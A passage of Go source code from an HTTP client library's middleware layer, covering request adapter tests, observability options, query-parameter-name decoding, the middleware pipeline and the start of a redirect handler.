&absauth.AnonymousAuthenticationProvider{} 34 | adapter, err := NewNetHttpRequestAdapter(authProvider) 35 | assert.Nil(t, err) 36 | assert.NotNil(t, adapter) 37 | 38 | uri, err := url.Parse(testServer.URL) 39 | assert.Nil(t, err) 40 | assert.NotNil(t, uri) 41 | request := abs.NewRequestInformation() 42 | request.SetUri(*uri) 43 | request.Method = abs.GET 44 | 45 | err2 := adapter.SendNoContent(context.TODO(), request, nil) 46 | assert.Nil(t, err2) 47 | assert.Equal(t, 2, methodCallCount) 48 | } 49 | 50 | func TestItThrowsApiError(t *testing.T) { 51 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 52 | res.Header().Set("client-request-id", "example-guid") 53 | res.WriteHeader(500) 54 | res.Write([]byte("body")) 55 | })) 56 | defer func() { testServer.Close() }() 57 | authProvider := &absauth.AnonymousAuthenticationProvider{} 58 | adapter, err := NewNetHttpRequestAdapter(authProvider) 59 | assert.Nil(t, err) 60 | assert.NotNil(t, adapter) 61 | 62 | uri, err := url.Parse(testServer.URL) 63 | assert.Nil(t, err) 64 | assert.NotNil(t, uri) 65 | request := abs.NewRequestInformation() 66 | request.SetUri(*uri) 67 | request.Method = abs.GET 68 | 69 | err2 := adapter.SendNoContent(context.TODO(), request, nil) 70 | assert.NotNil(t, err2) 71 | apiError, ok := err2.(*abs.ApiError) 72 | if !ok { 73 | t.Fail() 74 | } 75 | assert.Equal(t, 500, apiError.ResponseStatusCode) 76 | assert.Equal(t, "example-guid", apiError.ResponseHeaders.Get("client-request-id")[0]) 77 | } 78 | 79 | func TestGenericError(t *testing.T) { 80 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 81 | res.WriteHeader(500) 82 | res.Write([]byte("test")) 83 | })) 84 | defer func() { testServer.Close() }() 85 | authProvider := &absauth.AnonymousAuthenticationProvider{} 86 | adapter, err := NewNetHttpRequestAdapterWithParseNodeFactory(authProvider, &internal.MockParseNodeFactory{}) 87 | 
assert.Nil(t, err) 88 | assert.NotNil(t, adapter) 89 | 90 | uri, err := url.Parse(testServer.URL) 91 | assert.Nil(t, err) 92 | assert.NotNil(t, uri) 93 | request := abs.NewRequestInformation() 94 | request.SetUri(*uri) 95 | request.Method = abs.GET 96 | 97 | result := 0 98 | errorMapping := abs.ErrorMappings{ 99 | "XXX": func(parseNode serialization.ParseNode) (serialization.Parsable, error) { 100 | result++ 101 | return nil, &abs.ApiError{ 102 | Message: "test XXX message", 103 | } 104 | }, 105 | } 106 | 107 | _, err2 := adapter.SendPrimitive(context.TODO(), request, "[]byte", errorMapping) 108 | assert.NotNil(t, err2) 109 | assert.Equal(t, 1, result) 110 | assert.Equal(t, "test XXX message", err2.Error()) 111 | } 112 | 113 | func TestImplementationHonoursInterface(t *testing.T) { 114 | authProvider := &absauth.AnonymousAuthenticationProvider{} 115 | adapter, err := NewNetHttpRequestAdapter(authProvider) 116 | assert.Nil(t, err) 117 | assert.NotNil(t, adapter) 118 | 119 | assert.Implements(t, (*abs.RequestAdapter)(nil), adapter) 120 | } 121 | 122 | func TestItDoesntFailOnEmptyContentType(t *testing.T) { 123 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 124 | res.WriteHeader(201) 125 | })) 126 | defer func() { testServer.Close() }() 127 | authProvider := &absauth.AnonymousAuthenticationProvider{} 128 | adapter, err := NewNetHttpRequestAdapter(authProvider) 129 | assert.Nil(t, err) 130 | assert.NotNil(t, adapter) 131 | 132 | uri, err := url.Parse(testServer.URL) 133 | assert.Nil(t, err) 134 | assert.NotNil(t, uri) 135 | request := abs.NewRequestInformation() 136 | request.SetUri(*uri) 137 | request.Method = abs.GET 138 | 139 | res, err := adapter.Send(context.Background(), request, nil, nil) 140 | assert.Nil(t, err) 141 | assert.Nil(t, res) 142 | } 143 | 144 | func TestItReturnsUsableStreamOnStream(t *testing.T) { 145 | statusCodes := []int{200, 201, 202, 203, 206} 146 | 147 | for i := 0; i < 
len(statusCodes); i++ { 148 | 149 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 150 | res.WriteHeader(statusCodes[i]) 151 | res.Write([]byte("test")) 152 | })) 153 | defer func() { testServer.Close() }() 154 | authProvider := &absauth.AnonymousAuthenticationProvider{} 155 | adapter, err := NewNetHttpRequestAdapter(authProvider) 156 | assert.Nil(t, err) 157 | assert.NotNil(t, adapter) 158 | 159 | uri, err := url.Parse(testServer.URL) 160 | assert.Nil(t, err) 161 | assert.NotNil(t, uri) 162 | request := abs.NewRequestInformation() 163 | request.SetUri(*uri) 164 | request.Method = abs.GET 165 | 166 | res, err2 := adapter.SendPrimitive(context.TODO(), request, "[]byte", nil) 167 | assert.Nil(t, err2) 168 | assert.NotNil(t, res) 169 | assert.Equal(t, 4, len(res.([]byte))) 170 | } 171 | } 172 | 173 | func TestItReturnsNilOnStream(t *testing.T) { 174 | statusCodes := []int{200, 201, 202, 203, 204} 175 | 176 | for i := 0; i < len(statusCodes); i++ { 177 | 178 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 179 | res.WriteHeader(statusCodes[i]) 180 | })) 181 | defer func() { testServer.Close() }() 182 | authProvider := &absauth.AnonymousAuthenticationProvider{} 183 | adapter, err := NewNetHttpRequestAdapter(authProvider) 184 | assert.Nil(t, err) 185 | assert.NotNil(t, adapter) 186 | 187 | uri, err := url.Parse(testServer.URL) 188 | assert.Nil(t, err) 189 | assert.NotNil(t, uri) 190 | request := abs.NewRequestInformation() 191 | request.SetUri(*uri) 192 | request.Method = abs.GET 193 | 194 | res, err2 := adapter.SendPrimitive(context.TODO(), request, "[]byte", nil) 195 | assert.Nil(t, err2) 196 | assert.Nil(t, res) 197 | } 198 | } 199 | 200 | func TestSendNoContentDoesntFailOnOtherCodes(t *testing.T) { 201 | statusCodes := []int{200, 201, 202, 203, 204, 206} 202 | 203 | for i := 0; i < len(statusCodes); i++ { 204 | 205 | testServer := 
httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 206 | res.WriteHeader(statusCodes[i]) 207 | })) 208 | defer func() { testServer.Close() }() 209 | authProvider := &absauth.AnonymousAuthenticationProvider{} 210 | adapter, err := NewNetHttpRequestAdapter(authProvider) 211 | assert.Nil(t, err) 212 | assert.NotNil(t, adapter) 213 | 214 | uri, err := url.Parse(testServer.URL) 215 | assert.Nil(t, err) 216 | assert.NotNil(t, uri) 217 | request := abs.NewRequestInformation() 218 | request.SetUri(*uri) 219 | request.Method = abs.GET 220 | 221 | err2 := adapter.SendNoContent(context.TODO(), request, nil) 222 | assert.Nil(t, err2) 223 | } 224 | } 225 | 226 | func TestSendReturnNilOnNoContent(t *testing.T) { 227 | statusCodes := []int{200, 201, 202, 203, 204, 205} 228 | 229 | for i := 0; i < len(statusCodes); i++ { 230 | 231 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 232 | res.WriteHeader(statusCodes[i]) 233 | })) 234 | defer func() { testServer.Close() }() 235 | authProvider := &absauth.AnonymousAuthenticationProvider{} 236 | adapter, err := NewNetHttpRequestAdapter(authProvider) 237 | assert.Nil(t, err) 238 | assert.NotNil(t, adapter) 239 | 240 | uri, err := url.Parse(testServer.URL) 241 | assert.Nil(t, err) 242 | assert.NotNil(t, uri) 243 | request := abs.NewRequestInformation() 244 | request.SetUri(*uri) 245 | request.Method = abs.GET 246 | 247 | res, err2 := adapter.Send(context.TODO(), request, internal.MockEntityFactory, nil) 248 | assert.Nil(t, err2) 249 | assert.Nil(t, res) 250 | } 251 | } 252 | 253 | func TestSendReturnErrOnNoContent(t *testing.T) { 254 | // Subset of status codes this applies to since there's many of them. This 255 | // could be switched to ranges if full coverage is desired. 
256 | statusCodes := []int{nethttp.StatusBadRequest, nethttp.StatusInternalServerError} 257 | 258 | for _, code := range statusCodes { 259 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 260 | res.WriteHeader(code) 261 | })) 262 | defer func() { testServer.Close() }() 263 | 264 | authProvider := &absauth.AnonymousAuthenticationProvider{} 265 | adapter, err := NewNetHttpRequestAdapter(authProvider) 266 | assert.Nil(t, err) 267 | assert.NotNil(t, adapter) 268 | 269 | uri, err := url.Parse(testServer.URL) 270 | assert.Nil(t, err) 271 | assert.NotNil(t, uri) 272 | request := abs.NewRequestInformation() 273 | request.SetUri(*uri) 274 | request.Method = abs.GET 275 | 276 | res, err2 := adapter.Send(context.TODO(), request, internal.MockEntityFactory, nil) 277 | assert.Error(t, err2) 278 | assert.Nil(t, res) 279 | } 280 | } 281 | 282 | func TestSendReturnsObjectOnContent(t *testing.T) { 283 | statusCodes := []int{200, 201, 202, 203, 204, 205} 284 | 285 | for i := 0; i < len(statusCodes); i++ { 286 | 287 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 288 | res.WriteHeader(statusCodes[i]) 289 | })) 290 | defer func() { testServer.Close() }() 291 | authProvider := &absauth.AnonymousAuthenticationProvider{} 292 | adapter, err := NewNetHttpRequestAdapterWithParseNodeFactory(authProvider, &internal.MockParseNodeFactory{}) 293 | assert.Nil(t, err) 294 | assert.NotNil(t, adapter) 295 | 296 | uri, err := url.Parse(testServer.URL) 297 | assert.Nil(t, err) 298 | assert.NotNil(t, uri) 299 | request := abs.NewRequestInformation() 300 | request.SetUri(*uri) 301 | request.Method = abs.GET 302 | 303 | res, err2 := adapter.Send(context.TODO(), request, internal.MockEntityFactory, nil) 304 | assert.Nil(t, err2) 305 | assert.Nil(t, res) 306 | } 307 | } 308 | 309 | func TestResponseHandlerIsCalledWhenProvided(t *testing.T) { 310 | testServer := 
httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 311 | res.WriteHeader(201) 312 | })) 313 | defer func() { testServer.Close() }() 314 | authProvider := &absauth.AnonymousAuthenticationProvider{} 315 | adapter, err := NewNetHttpRequestAdapter(authProvider) 316 | assert.Nil(t, err) 317 | assert.NotNil(t, adapter) 318 | 319 | uri, err := url.Parse(testServer.URL) 320 | assert.Nil(t, err) 321 | assert.NotNil(t, uri) 322 | request := abs.NewRequestInformation() 323 | request.SetUri(*uri) 324 | request.Method = abs.GET 325 | 326 | count := 1 327 | responseHandler := func(response interface{}, errorMappings abs.ErrorMappings) (interface{}, error) { 328 | count = 2 329 | return nil, nil 330 | } 331 | 332 | handlerOption := abs.NewRequestHandlerOption() 333 | handlerOption.SetResponseHandler(responseHandler) 334 | 335 | request.AddRequestOptions([]abs.RequestOption{handlerOption}) 336 | 337 | err = adapter.SendNoContent(context.Background(), request, nil) 338 | assert.Nil(t, err) 339 | assert.Equal(t, 2, count) 340 | } 341 | 342 | func TestNetHttpRequestAdapter_EnableBackingStore(t *testing.T) { 343 | authProvider := &absauth.AnonymousAuthenticationProvider{} 344 | adapter, err := NewNetHttpRequestAdapter(authProvider) 345 | assert.NoError(t, err) 346 | 347 | var store = func() absstore.BackingStore { 348 | return nil 349 | } 350 | 351 | assert.NotEqual(t, absstore.BackingStoreFactoryInstance(), store()) 352 | adapter.EnableBackingStore(store) 353 | assert.Equal(t, absstore.BackingStoreFactoryInstance(), store()) 354 | } 355 | -------------------------------------------------------------------------------- /observability_options.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | 6 | abs "github.com/microsoft/kiota-abstractions-go" 7 | ) 8 | 9 | // ObservabilityOptions holds the tracing, metrics and logging configuration for 
the request adapter 10 | type ObservabilityOptions struct { 11 | // Whether to include attributes which could contains EUII information like URLs 12 | IncludeEUIIAttributes bool 13 | } 14 | 15 | // GetTracerInstrumentationName returns the observability name to use for the tracer 16 | func (o *ObservabilityOptions) GetTracerInstrumentationName() string { 17 | return "github.com/ordinaryhydr/kiota-http-go" 18 | } 19 | 20 | // GetIncludeEUIIAttributes returns whether to include attributes which could contains EUII information 21 | func (o *ObservabilityOptions) GetIncludeEUIIAttributes() bool { 22 | return o.IncludeEUIIAttributes 23 | } 24 | 25 | // SetIncludeEUIIAttributes set whether to include attributes which could contains EUII information 26 | func (o *ObservabilityOptions) SetIncludeEUIIAttributes(value bool) { 27 | o.IncludeEUIIAttributes = value 28 | } 29 | 30 | // ObservabilityOptionsInt defines the options contract for handlers 31 | type ObservabilityOptionsInt interface { 32 | abs.RequestOption 33 | GetTracerInstrumentationName() string 34 | GetIncludeEUIIAttributes() bool 35 | SetIncludeEUIIAttributes(value bool) 36 | } 37 | 38 | func (*ObservabilityOptions) GetKey() abs.RequestOptionKey { 39 | return observabilityOptionsKeyValue 40 | } 41 | 42 | var observabilityOptionsKeyValue = abs.RequestOptionKey{ 43 | Key: "ObservabilityOptions", 44 | } 45 | 46 | // GetObservabilityOptionsFromRequest returns the observability options from the request context 47 | func GetObservabilityOptionsFromRequest(req *nethttp.Request) ObservabilityOptionsInt { 48 | if options, ok := req.Context().Value(observabilityOptionsKeyValue).(ObservabilityOptionsInt); ok { 49 | return options 50 | } 51 | return nil 52 | } 53 | -------------------------------------------------------------------------------- /parameters_name_decoding_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp 
"net/http" 5 | "strconv" 6 | "strings" 7 | 8 | abs "github.com/microsoft/kiota-abstractions-go" 9 | "go.opentelemetry.io/otel" 10 | "go.opentelemetry.io/otel/attribute" 11 | ) 12 | 13 | // ParametersNameDecodingOptions defines the options for the ParametersNameDecodingHandler 14 | type ParametersNameDecodingOptions struct { 15 | // Enable defines if the parameters name decoding should be enabled 16 | Enable bool 17 | // ParametersToDecode defines the characters that should be decoded 18 | ParametersToDecode []byte 19 | } 20 | 21 | // ParametersNameDecodingHandler decodes special characters in the request query parameters that had to be encoded due to RFC 6570 restrictions names before executing the request. 22 | type ParametersNameDecodingHandler struct { 23 | options ParametersNameDecodingOptions 24 | } 25 | 26 | // NewParametersNameDecodingHandler creates a new ParametersNameDecodingHandler with default options 27 | func NewParametersNameDecodingHandler() *ParametersNameDecodingHandler { 28 | return NewParametersNameDecodingHandlerWithOptions(ParametersNameDecodingOptions{ 29 | Enable: true, 30 | ParametersToDecode: []byte{'-', '.', '~', '$'}, 31 | }) 32 | } 33 | 34 | // NewParametersNameDecodingHandlerWithOptions creates a new ParametersNameDecodingHandler with the given options 35 | func NewParametersNameDecodingHandlerWithOptions(options ParametersNameDecodingOptions) *ParametersNameDecodingHandler { 36 | return &ParametersNameDecodingHandler{options: options} 37 | } 38 | 39 | type parametersNameDecodingOptionsInt interface { 40 | abs.RequestOption 41 | GetEnable() bool 42 | GetParametersToDecode() []byte 43 | } 44 | 45 | var parametersNameDecodingKeyValue = abs.RequestOptionKey{ 46 | Key: "ParametersNameDecodingHandler", 47 | } 48 | 49 | // GetKey returns the key value to be used when the option is added to the request context 50 | func (options *ParametersNameDecodingOptions) GetKey() abs.RequestOptionKey { 51 | return parametersNameDecodingKeyValue 52 | } 
53 | 54 | // GetEnable returns the enable value from the option 55 | func (options *ParametersNameDecodingOptions) GetEnable() bool { 56 | return options.Enable 57 | } 58 | 59 | // GetParametersToDecode returns the parametersToDecode value from the option 60 | func (options *ParametersNameDecodingOptions) GetParametersToDecode() []byte { 61 | return options.ParametersToDecode 62 | } 63 | 64 | // Intercept implements the RequestInterceptor interface and decodes the parameters name 65 | func (handler *ParametersNameDecodingHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *nethttp.Request) (*nethttp.Response, error) { 66 | reqOption, ok := req.Context().Value(parametersNameDecodingKeyValue).(parametersNameDecodingOptionsInt) 67 | if !ok { 68 | reqOption = &handler.options 69 | } 70 | obsOptions := GetObservabilityOptionsFromRequest(req) 71 | ctx := req.Context() 72 | if obsOptions != nil { 73 | ctx, span := otel.GetTracerProvider().Tracer(obsOptions.GetTracerInstrumentationName()).Start(ctx, "ParametersNameDecodingHandler_Intercept") 74 | span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.parameters_name_decoding.enable", reqOption.GetEnable())) 75 | req = req.WithContext(ctx) 76 | defer span.End() 77 | } 78 | if reqOption.GetEnable() && 79 | len(reqOption.GetParametersToDecode()) != 0 && 80 | strings.Contains(req.URL.RawQuery, "%") { 81 | req.URL.RawQuery = decodeUriEncodedString(req.URL.RawQuery, reqOption.GetParametersToDecode()) 82 | } 83 | return pipeline.Next(req, middlewareIndex) 84 | } 85 | 86 | func decodeUriEncodedString(originalValue string, parametersToDecode []byte) string { 87 | resultValue := originalValue 88 | for _, parameter := range parametersToDecode { 89 | valueToReplace := "%" + strconv.FormatInt(int64(parameter), 16) 90 | replacementValue := string(parameter) 91 | resultValue = strings.ReplaceAll(strings.ReplaceAll(resultValue, strings.ToUpper(valueToReplace), replacementValue), strings.ToLower(valueToReplace), 
replacementValue) 92 | } 93 | return resultValue 94 | } 95 | -------------------------------------------------------------------------------- /parameters_name_decoding_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | httptest "net/http/httptest" 6 | "testing" 7 | 8 | "github.com/stretchr/testify/assert" 9 | ) 10 | 11 | func TestItDecodesQueryParameterNames(t *testing.T) { 12 | testData := [][]string{ 13 | {"?%24select=diplayName&api%2Dversion=2", "/?$select=diplayName&api-version=2"}, 14 | {"?%24select=diplayName&api%7Eversion=2", "/?$select=diplayName&api~version=2"}, 15 | {"?%24select=diplayName&api%2Eversion=2", "/?$select=diplayName&api.version=2"}, 16 | {"/api-version/?%24select=diplayName&api%2Eversion=2", "/api-version/?$select=diplayName&api.version=2"}, 17 | {"", "/"}, 18 | {"?q=1%2B2", "/?q=1%2B2"}, //Values are not decoded 19 | {"?q=M%26A", "/?q=M%26A"}, //Values are not decoded 20 | {"?q%2D1=M%26A", "/?q-1=M%26A"}, //Values are not decoded but params are 21 | {"?q%2D1&q=M%26A=M%26A", "/?q-1&q=M%26A=M%26A"}, //Values are not decoded but params are 22 | {"?%24select=diplayName&api%2Dversion=1%2B2", "/?$select=diplayName&api-version=1%2B2"}, //Values are not decoded but params are 23 | {"?%24select=diplayName&api%2Dversion=M%26A", "/?$select=diplayName&api-version=M%26A"}, //Values are not decoded but params are 24 | {"?%24select=diplayName&api%7Eversion=M%26A", "/?$select=diplayName&api~version=M%26A"}, //Values are not decoded but params are 25 | {"?%24select=diplayName&api%2Eversion=M%26A", "/?$select=diplayName&api.version=M%26A"}, //Values are not decoded but params are 26 | {"?%24select=diplayName&api%2Eversion=M%26A", "/?$select=diplayName&api.version=M%26A"}, //Values are not decoded but params are 27 | } 28 | result := "" 29 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req 
*nethttp.Request) { 30 | result = req.URL.String() 31 | res.WriteHeader(200) 32 | res.Write([]byte("body")) 33 | })) 34 | defer func() { testServer.Close() }() 35 | for _, data := range testData { 36 | handler := NewParametersNameDecodingHandler() 37 | input := testServer.URL + data[0] 38 | expected := data[1] 39 | req, err := nethttp.NewRequest(nethttp.MethodGet, input, nil) 40 | if err != nil { 41 | t.Error(err) 42 | } 43 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 44 | if err != nil { 45 | t.Error(err) 46 | } 47 | assert.NotNil(t, resp) 48 | assert.Equal(t, expected, result) 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /pipeline.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | 6 | "go.opentelemetry.io/otel" 7 | "go.opentelemetry.io/otel/trace" 8 | ) 9 | 10 | // Pipeline contract for middleware infrastructure 11 | type Pipeline interface { 12 | // Next moves the request object through middlewares in the pipeline 13 | Next(req *nethttp.Request, middlewareIndex int) (*nethttp.Response, error) 14 | } 15 | 16 | // custom transport for net/http with a middleware pipeline 17 | type customTransport struct { 18 | // middleware pipeline in use for the client 19 | middlewarePipeline *middlewarePipeline 20 | } 21 | 22 | // middleware pipeline implementation using a roundtripper from net/http 23 | type middlewarePipeline struct { 24 | // the round tripper to use to execute the request 25 | transport nethttp.RoundTripper 26 | // the middlewares to execute 27 | middlewares []Middleware 28 | } 29 | 30 | func newMiddlewarePipeline(middlewares []Middleware, transport nethttp.RoundTripper) *middlewarePipeline { 31 | return &middlewarePipeline{ 32 | transport: transport, 33 | middlewares: middlewares, 34 | } 35 | } 36 | 37 | // Next moves the request object through middlewares in the pipeline 38 | func 
(pipeline *middlewarePipeline) Next(req *nethttp.Request, middlewareIndex int) (*nethttp.Response, error) { 39 | if middlewareIndex < len(pipeline.middlewares) { 40 | middleware := pipeline.middlewares[middlewareIndex] 41 | return middleware.Intercept(pipeline, middlewareIndex+1, req) 42 | } 43 | obsOptions := GetObservabilityOptionsFromRequest(req) 44 | ctx := req.Context() 45 | var span trace.Span 46 | var observabilityName string 47 | if obsOptions != nil { 48 | observabilityName = obsOptions.GetTracerInstrumentationName() 49 | ctx, span = otel.GetTracerProvider().Tracer(observabilityName).Start(ctx, "request_transport") 50 | defer span.End() 51 | req = req.WithContext(ctx) 52 | } 53 | return pipeline.transport.RoundTrip(req) 54 | } 55 | 56 | // RoundTrip executes the the next middleware and returns a response 57 | func (transport *customTransport) RoundTrip(req *nethttp.Request) (*nethttp.Response, error) { 58 | return transport.middlewarePipeline.Next(req, 0) 59 | } 60 | 61 | // GetDefaultTransport returns the default http transport used by the library 62 | func GetDefaultTransport() nethttp.RoundTripper { 63 | defaultTransport, ok := nethttp.DefaultTransport.(*nethttp.Transport) 64 | if !ok { 65 | return nethttp.DefaultTransport 66 | } 67 | defaultTransport = defaultTransport.Clone() 68 | defaultTransport.ForceAttemptHTTP2 = true 69 | defaultTransport.DisableCompression = false 70 | return defaultTransport 71 | } 72 | 73 | // NewCustomTransport creates a new custom transport for http client with the provided set of middleware 74 | func NewCustomTransport(middlewares ...Middleware) *customTransport { 75 | return NewCustomTransportWithParentTransport(nil, middlewares...) 
76 | } 77 | 78 | // NewCustomTransportWithParentTransport creates a new custom transport which relies on the provided transport for http client with the provided set of middleware 79 | func NewCustomTransportWithParentTransport(parentTransport nethttp.RoundTripper, middlewares ...Middleware) *customTransport { 80 | if len(middlewares) == 0 { 81 | middlewares = GetDefaultMiddlewares() 82 | } 83 | if parentTransport == nil { 84 | parentTransport = GetDefaultTransport() 85 | } 86 | return &customTransport{ 87 | middlewarePipeline: newMiddlewarePipeline(middlewares, parentTransport), 88 | } 89 | } 90 | -------------------------------------------------------------------------------- /pipeline_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | assert "github.com/stretchr/testify/assert" 5 | "net/http" 6 | "testing" 7 | ) 8 | 9 | type TestMiddleware struct{} 10 | 11 | func (middleware TestMiddleware) Intercept(pipeline Pipeline, middlewareIndex int, req *http.Request) (*http.Response, error) { 12 | req.Header.Add("test", "test-header") 13 | 14 | return pipeline.Next(req, middlewareIndex) 15 | } 16 | 17 | func TestCanInterceptRequests(t *testing.T) { 18 | transport := NewCustomTransport(&TestMiddleware{}) 19 | client := &http.Client{Transport: transport} 20 | resp, _ := client.Get("https://example.com") 21 | 22 | expect := "test-header" 23 | got := resp.Request.Header.Get("test") 24 | 25 | if expect != got { 26 | t.Errorf("Expected: %v, but received: %v", expect, got) 27 | } 28 | } 29 | 30 | func TestCanInterceptMultipleRequests(t *testing.T) { 31 | transport := NewCustomTransport(&TestMiddleware{}) 32 | client := &http.Client{Transport: transport} 33 | resp, _ := client.Get("https://example.com") 34 | 35 | expect := "test-header" 36 | got := resp.Request.Header.Get("test") 37 | 38 | if expect != got { 39 | t.Errorf("Expected: %v, but received: %v", expect, got) 40 | } 41 | 42 | resp2, _ 
:= client.Get("https://example.com") 43 | 44 | got2 := resp2.Request.Header.Get("test") 45 | 46 | if expect != got2 { 47 | t.Errorf("Expected: %v, but received: %v", expect, got2) 48 | } 49 | } 50 | 51 | func TestItReturnsADefaultTransport(t *testing.T) { 52 | transport := GetDefaultTransport() 53 | assert.NotNil(t, transport) 54 | defaultTransport, ok := transport.(*http.Transport) 55 | assert.True(t, ok) 56 | assert.True(t, defaultTransport.ForceAttemptHTTP2) 57 | } 58 | 59 | func TestItAcceptsACustomizedTransport(t *testing.T) { 60 | transport := http.DefaultTransport.(*http.Transport).Clone() 61 | transport.ForceAttemptHTTP2 = false 62 | customTransport := NewCustomTransportWithParentTransport(transport) 63 | assert.NotNil(t, customTransport) 64 | result, ok := customTransport.middlewarePipeline.transport.(*http.Transport) 65 | assert.True(t, ok) 66 | assert.False(t, result.ForceAttemptHTTP2) 67 | } 68 | 69 | func TestItGetsADefaultTransportIfNoneIsProvided(t *testing.T) { 70 | customTransport := NewCustomTransport() 71 | assert.NotNil(t, customTransport.middlewarePipeline.transport) 72 | } 73 | -------------------------------------------------------------------------------- /redirect_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "context" 5 | "errors" 6 | "fmt" 7 | nethttp "net/http" 8 | "net/url" 9 | "strings" 10 | 11 | abs "github.com/microsoft/kiota-abstractions-go" 12 | "go.opentelemetry.io/otel" 13 | "go.opentelemetry.io/otel/attribute" 14 | "go.opentelemetry.io/otel/trace" 15 | ) 16 | 17 | // RedirectHandler handles redirect responses and follows them according to the options specified. 18 | type RedirectHandler struct { 19 | // options to use when evaluating whether to redirect or not 20 | options RedirectHandlerOptions 21 | } 22 | 23 | // NewRedirectHandler creates a new redirect handler with the default options. 
24 | func NewRedirectHandler() *RedirectHandler { 25 | return NewRedirectHandlerWithOptions(RedirectHandlerOptions{ 26 | MaxRedirects: defaultMaxRedirects, 27 | ShouldRedirect: func(req *nethttp.Request, res *nethttp.Response) bool { 28 | return true 29 | }, 30 | }) 31 | } 32 | 33 | // NewRedirectHandlerWithOptions creates a new redirect handler with the specified options. 34 | func NewRedirectHandlerWithOptions(options RedirectHandlerOptions) *RedirectHandler { 35 | return &RedirectHandler{options: options} 36 | } 37 | 38 | // RedirectHandlerOptions to use when evaluating whether to redirect or not. 39 | type RedirectHandlerOptions struct { 40 | // A callback that determines whether to redirect or not. 41 | ShouldRedirect func(req *nethttp.Request, res *nethttp.Response) bool 42 | // The maximum number of redirects to follow. 43 | MaxRedirects int 44 | } 45 | 46 | var redirectKeyValue = abs.RequestOptionKey{ 47 | Key: "RedirectHandler", 48 | } 49 | 50 | type redirectHandlerOptionsInt interface { 51 | abs.RequestOption 52 | GetShouldRedirect() func(req *nethttp.Request, res *nethttp.Response) bool 53 | GetMaxRedirect() int 54 | } 55 | 56 | // GetKey returns the key value to be used when the option is added to the request context 57 | func (options *RedirectHandlerOptions) GetKey() abs.RequestOptionKey { 58 | return redirectKeyValue 59 | } 60 | 61 | // GetShouldRedirect returns the redirection evaluation function. 62 | func (options *RedirectHandlerOptions) GetShouldRedirect() func(req *nethttp.Request, res *nethttp.Response) bool { 63 | return options.ShouldRedirect 64 | } 65 | 66 | // GetMaxRedirect returns the maximum number of redirects to follow. 
67 | func (options *RedirectHandlerOptions) GetMaxRedirect() int { 68 | if options == nil || options.MaxRedirects < 1 { 69 | return defaultMaxRedirects 70 | } else if options.MaxRedirects > absoluteMaxRedirects { 71 | return absoluteMaxRedirects 72 | } else { 73 | return options.MaxRedirects 74 | } 75 | } 76 | 77 | const defaultMaxRedirects = 5 78 | const absoluteMaxRedirects = 20 79 | const movedPermanently = 301 80 | const found = 302 81 | const seeOther = 303 82 | const temporaryRedirect = 307 83 | const permanentRedirect = 308 84 | const locationHeader = "Location" 85 | 86 | // Intercept implements the interface and evaluates whether to follow a redirect response. 87 | func (middleware RedirectHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *nethttp.Request) (*nethttp.Response, error) { 88 | obsOptions := GetObservabilityOptionsFromRequest(req) 89 | ctx := req.Context() 90 | var span trace.Span 91 | var observabilityName string 92 | if obsOptions != nil { 93 | observabilityName = obsOptions.GetTracerInstrumentationName() 94 | ctx, span = otel.GetTracerProvider().Tracer(observabilityName).Start(ctx, "RedirectHandler_Intercept") 95 | span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.redirect.enable", true)) 96 | defer span.End() 97 | req = req.WithContext(ctx) 98 | } 99 | response, err := pipeline.Next(req, middlewareIndex) 100 | if err != nil { 101 | return response, err 102 | } 103 | reqOption, ok := req.Context().Value(redirectKeyValue).(redirectHandlerOptionsInt) 104 | if !ok { 105 | reqOption = &middleware.options 106 | } 107 | return middleware.redirectRequest(ctx, pipeline, middlewareIndex, reqOption, req, response, 0, observabilityName) 108 | } 109 | 110 | func (middleware RedirectHandler) redirectRequest(ctx context.Context, pipeline Pipeline, middlewareIndex int, reqOption redirectHandlerOptionsInt, req *nethttp.Request, response *nethttp.Response, redirectCount int, observabilityName string) (*nethttp.Response, error) { 111 
